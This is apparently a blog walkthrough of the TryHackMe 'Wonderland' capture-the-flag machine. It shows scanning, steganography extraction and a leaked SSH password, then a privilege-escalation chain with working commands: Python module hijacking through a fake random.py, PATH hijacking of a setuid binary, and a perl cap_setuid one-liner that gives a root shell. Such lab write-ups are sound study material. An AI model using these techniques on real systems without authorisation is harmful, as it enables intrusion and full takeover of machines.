Wonder Land | Walk Through | Try hack me

Wonder Land | Walk Through | Try hack me

          //////JOINED Wonder land/////////

–||/| SCANNING |\||–

 

STARTED NMAP SCAN — nmap -sC -sV -p 1-5000 -T3 10.10.5.154

Result —

Nmap scan report for 10.10.5.154
The host is up (0.30s latency).
Not shown: 4998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

||||||||||||
As we can see only 2 ports are open till 5000.
||||||||||||

STARTED GOBUSTER FOR FINDING THE DIRECTORIES — gobuster dir -u http://10.10.5.154 -w /usr/share/wordlists/dirb/common.txt -z

Result —

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.5.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/24 18:46:48 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [–> img/] /index.html (Status: 301) [Size: 0] [–> ./] /r (Status: 301) [Size: 0] [–> r/]

===============================================================
2021/07/24 18:49:14 Finished
===============================================================

|||||||||
Find 3 open directories nothing useful only /IMG directory have 3 images.
in /r we found this —
Keep Going.

“Would you tell me, please, which way I ought to go from here?”

So that’s why i started further scanning in r directory !!
|||||||||

STARTED FURTHER SCANNING FOR DIR /R WITH MIDUMUM DIRECTORIES — gobuster dir -u http://10.10.5.154/r/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z

Result —

Just find the
/a/ Directory after running that scan and there I found –
Keep Going.

“That depends a good deal on where you want to get to,” said the Cat.

As I mentioned before I had founded the IMG directory and I got pictures of nothing found in online Exif metadata information.

!!

Then I did some extraction from the rabbit picture —

steghide extract -sf

The result — follow the r a b b i t

|||||||||

So i STARTED TO FOLLOW THE RABBIT IN THE WEB SERVER IN r/a/b/b/i/t
Then i found this __
Open the door and enter the wonderland

“Oh, you’re sure to do that,” said the Cat, “if you only walk long enough.”

Alice felt that this could not be denied, so she tried another question. “What sort of people live about here?”

“In that direction,” the Cat said, waving its right paw round, “lives a Hatter: and in that direction,” waving the other paw, “lives a March Hare. Visit either you like: they’re both mad.”
||||||||||

AFTER WATHING ITS PAGE SOURCE I FOUND THIS __

<p style=”display: none;”>alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

||||||||||

Founded the user name and the password for ssh!

||||||||||

LOGGED INSIDE THE MACHINE AND FOUNDED USER.TXT IN ROOT!

This is the time to escalate the privilege!

 

Wonder land

 

                    \\\\\\\\\\ PRIVILEGE EXCULATION //////////

Looking at our privileges with sudo -l reveals the following:

sudo -l
[sudo] password for Alice:
Matching Defaults entries for Alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
We can run sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py as the user rabbit.

Even though we only have read access to walrus_and_the_carpenter.py and can’t edit the file, let’s see what the file is doing when executed.

import random
poem = ” The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —

And this was odd because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —

“It’s very rude of him,” she said,
“To come and spoil the fun!”

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because

No cloud was in the sky:
No birds were flying overhead —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see

Such quantities of sand:
“If this were only cleared away,”
They said, “it would be grand!”

[…]

for i in range(10):
line = random.choice(poem.split(“\n”))
Do to the length of the file, I’ve removed some of the poems that’s printed to the screen when we’re executing the file.

At the top of the file, we can see that the python module random is imported.
So, what if we create a file named random.py in our current working directory that executes /bin/bash? That way our python file should be loaded instead of the “real” random module, and in turn give us a shell as the rabbit user.

Our random.py:

import os

os.system(“/bin/bash”)
Executing the python script:

[email protected]wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
[email protected]:~$ whoami
rabbit
Awesome! We have escalated our privileges to the rabbit user.

 

Try hack me

 

Looking in /home/rabbit/ we find a setuid binary, and by examining the file we see that date is executed without specifying an absolute path:

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n ‘Probably by ‘ && date –date=’next hour’ -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
We can abuse this by exporting our own $PATH, writing a small script called date and running the setuid binary.

Exporting our own $PATH:

[email protected]:/home/rabbit$ export PATH=/tmp:$PATH
[email protected]:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Now, everytime a program is called without specifying an absolute path, our shell will first look in /tmp.

Creating our malicious date file

We now create a shell script called date, place that in /tmp and make it executable with chmod +x /tmp/date.

[email protected]:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash
All we now need to do is run the setuid binary and we should escalate to the user hatter.

[email protected]wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by [email protected]:/home/rabbit$
[email protected]:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
Awesome! We’re getting close.

Looking in the home directory of the user hatter reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user hatter:

ssh [email protected]
[email protected]’s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Fri Jun 5 22:48:04 UTC 2020

System load: 0.07 Processes: 95
Usage of /: 19.4% of 19.56GB Users logged in: 1
Memory usage: 32% IP address for eth0: 10.10.167.35
Swap usage: 0%

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jun 5 22:47:57 2020 from 10.11.4.205
[email protected]:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)
Doing some basic enumeration reveals that perl have the following capability set: cap_setuid+ep

[email protected]wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
We can easily abuse this and escalate to root!

[email protected]:~$ perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
We can now finally get the root.txt flag as well!!

Try hack me Wonderland Walk Through is Completed!

                 ///////////////// Wonder Land COMPLETEED/////////////////////////

 

 

Leave a Reply

Your email address will not be published.